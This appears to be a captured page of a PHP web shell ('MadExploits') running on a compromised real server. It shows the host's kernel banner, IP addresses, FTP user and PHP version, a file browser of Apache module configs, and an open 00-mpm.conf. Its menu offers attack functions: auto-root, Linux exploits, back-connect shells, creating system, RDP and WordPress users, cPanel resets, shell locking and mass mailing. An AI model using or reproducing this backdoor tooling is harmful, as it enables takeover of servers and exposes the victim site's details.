Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
httpd /
conf.modules.d /
[ HOME SHELL ]
Name
Size
Permission
Action
00-base.conf
3.23
KB
-rw-r--r--
00-dav.conf
139
B
-rw-r--r--
00-lua.conf
41
B
-rw-r--r--
00-mpm.conf
1.34
KB
-rw-r--r--
00-optional.conf
787
B
-rw-r--r--
00-proxy.conf
1.05
KB
-rw-r--r--
00-proxy_timeout.conf
31
B
-rw-r--r--
00-ssl.conf
41
B
-rw-r--r--
00-systemd.conf
88
B
-rw-r--r--
01-cgi.conf
451
B
-rw-r--r--
10-fcgid.conf
45
B
-rw-r--r--
10-h2.conf
45
B
-rw-r--r--
10-proxy_h2.conf
57
B
-rw-r--r--
15-php.conf
299
B
-rw-r--r--
README
496
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 00-mpm.conf
# Select the MPM module which should be used by uncommenting exactly # one of the following LoadModule lines. See the httpd.conf(5) man # page for more information on changing the MPM. # prefork MPM: Implements a non-threaded, pre-forking web server # See: http://httpd.apache.org/docs/2.4/mod/prefork.html # # NOTE: If enabling prefork, the httpd_graceful_shutdown SELinux # boolean should be enabled, to allow graceful stop/shutdown. # #LoadModule mpm_prefork_module modules/mod_mpm_prefork.so # worker MPM: Multi-Processing Module implementing a hybrid # multi-threaded multi-process web server # See: http://httpd.apache.org/docs/2.4/mod/worker.html # #LoadModule mpm_worker_module modules/mod_mpm_worker.so # event MPM: A variant of the worker MPM with the goal of consuming # threads only for connections with active processing # See: http://httpd.apache.org/docs/2.4/mod/event.html # LoadModule mpm_event_module modules/mod_mpm_event.so <IfModule mpm_event_module> ServerLimit 32 StartServers 8 MinSpareThreads 50 MaxSpareThreads 400 ThreadsPerChild 50 MaxRequestWorkers 1600 MaxConnectionsPerChild 800 GracefulShutdownTimeout 30 </IfModule>
Close